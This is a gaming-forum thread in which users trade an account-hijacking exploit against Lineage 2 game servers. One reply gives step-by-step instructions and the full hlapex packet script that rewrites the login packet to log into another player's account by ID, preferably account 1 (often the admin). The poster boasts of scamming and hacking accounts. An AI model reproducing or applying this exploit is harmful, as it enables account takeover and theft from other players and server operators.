Jump to content

Recommended Posts

Posted

I am trying it to a server named EternalSin but i got a prob

 

I open hlapex

then i open client

i go to script and i change account=1;  to account=myaccount;

Then i press Call init and it says in bottom:[ERROR] Undeclared Identifier:'myaccount'

 

What i am doing wrong and what should i do?

Posted

lol there was told everything about that exploit and u have problem like a 5 years old child. dont bother man im 100% sure that its fixed on eternalsin. btw wrong section

Posted

Rofl.. really u did it wrong dude.  :P

 

Open Hlapex --> Click Run.

Go Scripts in Halpex window then click 'LOAD'.

Load the account script see below for script:

 

const

account=527;

procedure Init;

begin

end;

procedure Free;

begin

end;

begin

if FromServer then exit;

if pck[1]=#$08 then

begin

buf:=#$08;

WriteS('');

WriteD(account);

WriteD(0);

pck:=buf;

end;

end.

 

As u can see the last account I scammed was this number.  :D

Account: 527

 

Change this to 1 if u like to start with L2Offcial server account nr. 1.

So it will be like this:

 

const

account=1;

procedure Init;

begin

end;

procedure Free;

begin

end;

begin

if FromServer then exit;

if pck[1]=#$08 then

begin

buf:=#$08;

WriteS('');

WriteD(account);

WriteD(0);

pck:=buf;

end;

end.

 

Most of the time this will be the admins account but always try it. (1st account on your selected server.)

 

When done u click: Call Init (To activate the code.)

 

Then launch l2.exe.

Login with your account.

Select server.

Result will be if working: Account with the char of another player or an empty account.

 

If not server patched.  :(

 

 

Posted

 

 

As u can see the last account I scammed was this number.  :D

Account: 527

 

 

Hmmm..In what server Mate ?

Posted

Uhm,.. I don't like to enter accounts withs are hacked before me.  :D

They have like 6 / 7 steps on every account that get created empty so hard work but it's worth it.

 

Btw,.. if u see Dozzer around. Chalalala,.. time goes by^^:

 

2004924330762470487_th.jpg

Posted

Uhm,.. I don't like to enter accounts withs are hacked before me.  :D

They have like 6 / 7 steps on every account that get created empty so hard work but it's worth it.

 

Btw,.. if u see Dozzer around. Chalalala,.. time goes by^^:

 

2004924330762470487_th.jpg

may i know name of that server where is that picture?:D send me pm

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
×
  • Create New...